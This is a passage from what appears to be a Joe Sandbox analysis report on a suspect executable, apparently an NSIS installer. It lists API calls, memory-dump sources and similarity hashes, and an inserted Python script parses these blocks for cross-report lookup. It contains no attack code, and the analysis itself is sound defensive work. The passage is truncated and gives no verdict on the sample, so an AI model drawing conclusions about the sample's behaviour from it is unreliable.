                                 • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                • String ID: .B$N$open
                                • API String ID: 3615053054-847860968
                                • Opcode ID: da112c14776137c7bd89e7c73a234b8b17dddee6ca60b81d448b510bce2e22e9
                                • Instruction ID: 4310844e4bc5412d85e0e67e924f78a0a7df87fdbfd2fc52009ff806257c2229
                                • Opcode Fuzzy Hash: da112c14776137c7bd89e7c73a234b8b17dddee6ca60b81d448b510bce2e22e9
                                • Instruction Fuzzy Hash: 3161A1B1A40209BFEB109F60DC45F6A7B69EB54715F108036FB05BA2D1C7B8E951CF98
                                APIs
                                • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                • BeginPaint.USER32(?,?), ref: 00401047
                                • GetClientRect.USER32(?,?), ref: 0040105B
                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                • DeleteObject.GDI32(?), ref: 004010ED
                                • CreateFontIndirectA.GDI32(?), ref: 00401105
                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                • DrawTextA.USER32(00000000,00423680,000000FF,00000010,00000820), ref: 00401156
                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                • DeleteObject.GDI32(?), ref: 00401165
                                • EndPaint.USER32(?,?), ref: 0040116E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                • String ID: F
                                • API String ID: 941294808-1304234792
                                • Opcode ID: a16a50f16efb259b1f94ca86ef79a5d51e0f349a280e4e705ab109419a7a434d
                                • Instruction ID: 87972a138d556bacb88ba9c7fcdf6f47da3ec758f00315b8b39b68d2b09e4b9a
                                • Opcode Fuzzy Hash: a16a50f16efb259b1f94ca86ef79a5d51e0f349a280e4e705ab109419a7a434d
                                • Instruction Fuzzy Hash: 6441BC71804249AFCB058FA4CD459BFBFB9FF44314F00812AF951AA1A0C378EA54DFA5
                                APIs
                                  • Part of subcall function 00405CFF: GetModuleHandleA.KERNEL32(?,?,00000000,0040310E,00000008), ref: 00405D11
                                  • Part of subcall function 00405CFF: LoadLibraryA.KERNELBASE(?,?,00000000,0040310E,00000008), ref: 00405D1C
                                  • Part of subcall function 00405CFF: GetProcAddress.KERNEL32(00000000,?), ref: 00405D2D
                                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000001,?,00000000,?,?,004054C0,?,00000000,000000F1,?), ref: 00405778
                                • GetShortPathNameA.KERNEL32(?,00422608,00000400), ref: 00405781
                                • GetShortPathNameA.KERNEL32(00000000,00422080,00000400), ref: 0040579E
                                • wsprintfA.USER32 ref: 004057BC
                                • GetFileSize.KERNEL32(00000000,00000000,00422080,C0000000,00000004,00422080,?,?,?,00000000,000000F1,?), ref: 004057F7
                                • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 00405806
                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 0040581C
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00421C80,00000000,-0000000A,00409330,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405862
                                • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 00405874
                                • GlobalFree.KERNEL32(00000000), ref: 0040587B
                                • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 00405882
                                  • Part of subcall function 00405629: lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405837,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405630
                                  • Part of subcall function 00405629: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405837,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405660
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeLibraryLoadModulePointerProcReadSizeWritewsprintf
                                • String ID: %s=%s$[Rename]
                                • API String ID: 3772915668-1727408572
                                • Opcode ID: 07c12176a5373c156f7b76f79e2b8e53ec089a42cccabde25e202c2098703b15
                                • Instruction ID: 243778ea09c2d6121d89995a0746b628a30f71b2b4e684d8516dd3187c24d480
                                • Opcode Fuzzy Hash: 07c12176a5373c156f7b76f79e2b8e53ec089a42cccabde25e202c2098703b15
                                • Instruction Fuzzy Hash: 0E412032A05B067BE3207B619C48F6B3A5CEB40754F004436FD05F62D2EA38A8018ABE
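The per-function blocks above (an "APIs" list with `ref:` call-site addresses, a "Memory Dump Source" with the dump's base offset, and a "Similarity" record whose "API String ID" is two numbers joined by a hyphen) are what a practitioner pivots on when comparing this sample with other reports. The following Python is an added example, not part of the Joe Sandbox report or of Joe Security's tooling: it parses blocks in this layout into records, rebases each `ref` address to an RVA against the reported `Offset`, splits the `$`-separated String ID, and indexes blocks by their API String ID pair. The constructed `SAMPLE` is an abridged copy of two blocks from this page; the regular expressions and the assumption that the `-0` suffix accompanies an empty String ID are derived from the text visible here, not from any published format specification.

```python
"""Parse Joe Sandbox per-function 'APIs ... Similarity' blocks into records."""
from __future__ import annotations

import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample: two function blocks abridged from this report's text
# (link residue such as 'Download File' removed). Serves as offline input.
SAMPLE = """
APIs
  • Part of subcall function 00405CFF: GetModuleHandleA.KERNEL32(?,?,00000000,0040310E,00000008), ref: 00405D11
• CloseHandle.KERNEL32(00000000,?,00000000,00000001), ref: 00405778
• GetShortPathNameA.KERNEL32(?,00422608,00000400), ref: 00405781
• wsprintfA.USER32 ref: 004057BC
Strings
Memory Dump Source
• Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: File$Handle$CloseGlobalNamePathShortlstrlen
• String ID: %s=%s$[Rename]
• API String ID: 3772915668-1727408572
• Opcode ID: 07c12176a5373c156f7b76f79e2b8e53ec089a42cccabde25e202c2098703b15
• Instruction Fuzzy Hash: 0E412032A05B067BE3207B619C48F6B3A5CEB40754F004436FD05F62D2EA38A8018ABE
APIs
• FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040264D
Memory Dump Source
• Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: FileFindFirst
• String ID:
• API String ID: 1974802433-0
• Instruction Fuzzy Hash: 86F0E572A04101DFD700EBB49E49AEEB778DF51328FA0067BF101F20C1D2B84A45DB2A
"""

# One API line: optional 'Part of subcall function XXXXXXXX:' prefix, then
# Name.MODULE, optional (args), then ', ref: VA' (no comma when args are absent).
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<name>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,?\s+ref:\s*(?P<ref>[0-9A-F]{8})$"
)
KV_RE = re.compile(r"^•\s*(?P<key>[^:]+?):\s*(?P<val>.*)$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]          # as printed by the report, split on commas
    ref: int                 # call-site virtual address
    subcall: Optional[int]   # callee address when marked 'Part of subcall'


@dataclass
class FunctionBlock:
    apis: list[ApiCall] = field(default_factory=list)
    image_base: Optional[int] = None   # 'Offset:' of the source dump
    api_id: str = ""
    string_id: str = ""
    api_hash: int = 0                  # left half of 'API String ID'
    string_hash: int = 0               # right half of 'API String ID'
    opcode_id: str = ""
    instruction_fuzzy: str = ""

    def rva(self, va: int) -> int:
        """Call-site address relative to the reported image base."""
        return va - (self.image_base or 0)

    def strings(self) -> list[str]:
        """String ID is '$'-separated; empty list when the block has no strings."""
        return [s for s in self.string_id.split("$") if s]


def parse_blocks(text: str) -> list[FunctionBlock]:
    blocks: list[FunctionBlock] = []
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":                 # every function block opens with this header
            blocks.append(FunctionBlock())
            continue
        if not blocks or not line.startswith("•"):
            continue                       # 'Strings', 'Similarity', ... section headers
        blk = blocks[-1]
        m = API_RE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] is not None else []
            sub = int(m["sub"], 16) if m["sub"] else None
            blk.apis.append(ApiCall(m["name"], m["mod"], args, int(m["ref"], 16), sub))
            continue
        m = KV_RE.match(line)
        if not m:
            continue
        key, val = m["key"], m["val"]
        if key == "Source File":
            base = re.search(r"Offset:\s*([0-9A-F]{8})", val)
            if base:
                blk.image_base = int(base.group(1), 16)
        elif key == "API ID":
            blk.api_id = val
        elif key == "String ID":
            blk.string_id = val
        elif key == "API String ID":
            left, right = val.split("-", 1)
            blk.api_hash, blk.string_hash = int(left), int(right)
        elif key == "Opcode ID":
            blk.opcode_id = val
        elif key == "Instruction Fuzzy Hash":
            blk.instruction_fuzzy = val
    return blocks


def index_by_api_string_id(blocks: list[FunctionBlock]) -> dict:
    """Group blocks by (api_hash, string_hash) so the pair can be looked up across reports."""
    idx: dict = {}
    for blk in blocks:
        idx.setdefault((blk.api_hash, blk.string_hash), []).append(blk)
    return idx


def string_hash_matches_strings(blocks: list[FunctionBlock]) -> bool:
    """Assumed convention, observed on this page: a '-0' suffix appears exactly when String ID is empty."""
    return all((blk.string_hash == 0) == (not blk.strings()) for blk in blocks)


if __name__ == "__main__":
    for blk in parse_blocks(SAMPLE):
        calls = ", ".join(f"{c.name}@{blk.rva(c.ref):#x}" for c in blk.apis)
        print(f"{blk.api_hash}-{blk.string_hash}: {calls}; strings={blk.strings()}")
```

Feed it the text of a whole "Execution Graph" section and the `(api_hash, string_hash)` keys become a cheap join column between this report and others; the RVAs line up directly with the `ref:` addresses once the dump is loaded at its reported base.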
                                APIs
                                • CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\G3izWAY3Fa.exe",C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 00405C97
                                • CharNextA.USER32(?,?,?,00000000), ref: 00405CA4
                                • CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\G3izWAY3Fa.exe",C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 00405CA9
                                • CharPrevA.USER32(?,?,"C:\Users\user\Desktop\G3izWAY3Fa.exe",C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 00405CB9
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID: Char$Next$Prev
                                • String ID: "C:\Users\user\Desktop\G3izWAY3Fa.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                • API String ID: 589700163-1663183005
                                • Opcode ID: 5aa71b13a4eda0142438c40892e2bf660e792717ed83394db4a483eb7dc85cb7
                                • Instruction ID: 6e21827f4117d195ccc2fee92ee9dbca2865e9be55a4e6ca6148cbd3e4a13511
                                • Opcode Fuzzy Hash: 5aa71b13a4eda0142438c40892e2bf660e792717ed83394db4a483eb7dc85cb7
                                • Instruction Fuzzy Hash: F011905580CB942AFB3206384C48B776F99CB67764F58407BE8C4723C2D67C5C429B6D
                                APIs
                                • GetWindowLongA.USER32(?,000000EB), ref: 00403E13
                                • GetSysColor.USER32(00000000), ref: 00403E2F
                                • SetTextColor.GDI32(?,00000000), ref: 00403E3B
                                • SetBkMode.GDI32(?,?), ref: 00403E47
                                • GetSysColor.USER32(?), ref: 00403E5A
                                • SetBkColor.GDI32(?,?), ref: 00403E6A
                                • DeleteObject.GDI32(?), ref: 00403E84
                                • CreateBrushIndirect.GDI32(?), ref: 00403E8E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                • String ID:
                                • API String ID: 2320649405-0
                                • Opcode ID: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                                • Instruction ID: 6c7fdd900eb09a88ca35fb2207b5deae9db7ec429e3ae93f4f07cdddb38981b8
                                • Opcode Fuzzy Hash: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                                • Instruction Fuzzy Hash: 1F219671904744ABCB219F78DD08B4B7FF8AF00715F048A2AF856E22E1C338EA04CB95
                                APIs
                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026D0
                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026EC
                                • GlobalFree.KERNEL32(?), ref: 00402725
                                • WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 00402737
                                • GlobalFree.KERNEL32(00000000), ref: 0040273E
                                • CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 00402756
                                • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 0040276A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                • String ID:
                                • API String ID: 3294113728-0
                                • Opcode ID: 6c70dd5e24678078cb6415e9c6392547dd21b53fc970282deceed51b45fe2952
                                • Instruction ID: 12be5ee7c0a04460072f4a22dab7179149aa53ae67e7a866020ad89d1ba75591
                                • Opcode Fuzzy Hash: 6c70dd5e24678078cb6415e9c6392547dd21b53fc970282deceed51b45fe2952
                                • Instruction Fuzzy Hash: 5831C071C00128BBDF216FA5CD88EAE7E79EF04368F10423AF524762E0C7795D419BA8
                                APIs
                                • lstrlenA.KERNEL32(0041FC50,00000000,0040F020,00000000,?,?,?,?,?,?,?,?,?,00402F8B,00000000,?), ref: 00404DB4
                                • lstrlenA.KERNEL32(00402F8B,0041FC50,00000000,0040F020,00000000,?,?,?,?,?,?,?,?,?,00402F8B,00000000), ref: 00404DC4
                                • lstrcatA.KERNEL32(0041FC50,00402F8B,00402F8B,0041FC50,00000000,0040F020,00000000), ref: 00404DD7
                                • SetWindowTextA.USER32(0041FC50,0041FC50), ref: 00404DE9
                                • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404E0F
                                • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E29
                                • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E37
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                • String ID:
                                • API String ID: 2531174081-0
                                • Opcode ID: aa11647610f970b6d5c89beb7753eaef7f091513a46ac0765cbf1dd94c7bd241
                                • Instruction ID: 7f48be0438031ac4014e4461c76190d89e96d247d5b12388d0b77bfdc4e74ae1
                                • Opcode Fuzzy Hash: aa11647610f970b6d5c89beb7753eaef7f091513a46ac0765cbf1dd94c7bd241
                                • Instruction Fuzzy Hash: 09216DB1E00158BBDB119FA5CD84ADEBFB9FF45354F14807AFA04B6290C7398A419B98
                                APIs
                                • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404665
                                • GetMessagePos.USER32 ref: 0040466D
                                • ScreenToClient.USER32(?,?), ref: 00404687
                                • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404699
                                • SendMessageA.USER32(?,0000110C,00000000,?), ref: 004046BF
                                Similarity
                                • API ID: Message$Send$ClientScreen
                                • String ID: f
                                • API String ID: 41195575-1993550816
                                • Opcode ID: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                                • Instruction ID: 811e074b116e6ce6d11e192741490be2760717d42b69e64a674173994bb84636
                                • Opcode Fuzzy Hash: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                                • Instruction Fuzzy Hash: 4E014C71D00219BADB00DBA4DC85FFEBBB8AB59711F10052ABA00B61D0D7B8A9058BA5
                                APIs
                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B56
                                • MulDiv.KERNEL32(0005E600,00000064,?), ref: 00402B81
                                • wsprintfA.USER32 ref: 00402B91
                                • SetWindowTextA.USER32(?,?), ref: 00402BA1
                                • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BB3
                                Strings
                                • verifying installer: %d%%, xrefs: 00402B8B
                                Similarity
                                • API ID: Text$ItemTimerWindowwsprintf
                                • String ID: verifying installer: %d%%
                                • API String ID: 1451636040-82062127
                                • Opcode ID: bd1d3871bc3dbc50f966d73cf0113ae7f1e1d2dda644773975aa317f12337262
                                • Instruction ID: e41715c37a5330c5740685503c003044c4943c79b663b03d39d41db920bc543d
                                • Opcode Fuzzy Hash: bd1d3871bc3dbc50f966d73cf0113ae7f1e1d2dda644773975aa317f12337262
                                • Instruction Fuzzy Hash: 34014470A00209ABDB249F60DD09EAE3779AB04345F008039FA16B92D1D7B49A559F99
                                APIs
                                • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A57
                                • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A93
                                • RegCloseKey.ADVAPI32(?), ref: 00402A9C
                                • RegCloseKey.ADVAPI32(?), ref: 00402AC1
                                • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402ADF
                                Similarity
                                • API ID: Close$DeleteEnumOpen
                                • String ID:
                                • API String ID: 1912718029-0
                                • Opcode ID: 32cdae671697de7973d8bb2633bc31189b6b536a9ce7c2939538a07c10ae524a
                                • Instruction ID: 582bceb6e4b24316922a1ee6e85d565da044e62c79b522cd3b8563d0d5e38007
                                • Opcode Fuzzy Hash: 32cdae671697de7973d8bb2633bc31189b6b536a9ce7c2939538a07c10ae524a
                                • Instruction Fuzzy Hash: E7111771A10049BEEF31AF90DE49DAF7B7DEB44345B104036F906A10A0DBB49E51AF69
                                APIs
                                • GetDlgItem.USER32(?), ref: 00401CC5
                                • GetClientRect.USER32(00000000,?), ref: 00401CD2
                                • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401CF3
                                • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D01
                                • DeleteObject.GDI32(00000000), ref: 00401D10
                                Similarity
                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                • String ID:
                                • API String ID: 1849352358-0
                                • Opcode ID: 040e4684e74ef7b69d4f9af20bee9e4e1a156ef82e91de0239870d1665a1d994
                                • Instruction ID: c9eade559dcb8dabe12f7fb8fefc2ecb3bb817c4e851fb83d30c8e131ed4808d
                                • Opcode Fuzzy Hash: 040e4684e74ef7b69d4f9af20bee9e4e1a156ef82e91de0239870d1665a1d994
                                • Instruction Fuzzy Hash: B5F01DB2E04105BFD700EFA4EE89DAFB7BDEB44345B104576F602F2190C6789D018B69
                                APIs
                                • lstrlenA.KERNEL32(00420478,00420478,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404488,000000DF,0000040F,00000400,00000000), ref: 004045F6
                                • wsprintfA.USER32 ref: 004045FE
                                • SetDlgItemTextA.USER32(?,00420478), ref: 00404611
                                Similarity
                                • API ID: ItemTextlstrlenwsprintf
                                • String ID: %u.%u%s%s
                                • API String ID: 3540041739-3551169577
                                • Opcode ID: 1fe6c35c0a5c12af0758eda6fcd91f800dae708434e3b464b1985a7a483ce98e
                                • Instruction ID: de100ae33fd703a766e80fabf1c0ef7e237f6bef08e04a4196497c65211e5d03
                                • Opcode Fuzzy Hash: 1fe6c35c0a5c12af0758eda6fcd91f800dae708434e3b464b1985a7a483ce98e
                                • Instruction Fuzzy Hash: 331104B370012477DB10666D9C05EAF329DDBC6334F14023BFA2AF61D1E9388C1186E8
                                APIs
                                • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C0D
                                • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C25
                                Similarity
                                • API ID: MessageSend$Timeout
                                • String ID: !
                                • API String ID: 1777923405-2657877971
                                • Opcode ID: a21e9fedaf10b3d0faf8ff8eb7872d1ba6ab3a41dfe2fcd52b90142743086bd6
                                • Instruction ID: 089b6e11c3ee5c2ceb15467343933f82bc3488a694e04e66c57418204d538f9a
                                • Opcode Fuzzy Hash: a21e9fedaf10b3d0faf8ff8eb7872d1ba6ab3a41dfe2fcd52b90142743086bd6
                                • Instruction Fuzzy Hash: B321C4B1A44209BFEF01AFB4CE4AAAE7B75EF40344F14053EF602B60D1D6B84980E718
                                APIs
                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00422480,Error launching installer), ref: 00405262
                                • CloseHandle.KERNEL32(?), ref: 0040526F
                                Strings
                                • Error launching installer, xrefs: 00405250
                                • C:\Users\user\AppData\Local\Temp\, xrefs: 0040523D
                                Similarity
                                • API ID: CloseCreateHandleProcess
                                • String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer
                                • API String ID: 3712363035-1560902751
                                • Opcode ID: 1f2f9ff3088062fdf2c67fe66ccdb0f341c5896b9e6aafa6ba1adbb34377fffc
                                • Instruction ID: 0a3d69d2a3401d9d63374a1600280413a6fd3692a6ba6d2da32d4f839eaa01ec
                                • Opcode Fuzzy Hash: 1f2f9ff3088062fdf2c67fe66ccdb0f341c5896b9e6aafa6ba1adbb34377fffc
                                • Instruction Fuzzy Hash: BEE0E674A1010ABBDB00EF64DD09D6B7B7CFB00304B408621E911E2150D774E4108A79
                                APIs
                                • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030B5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 004054D6
                                • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004030B5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 004054DF
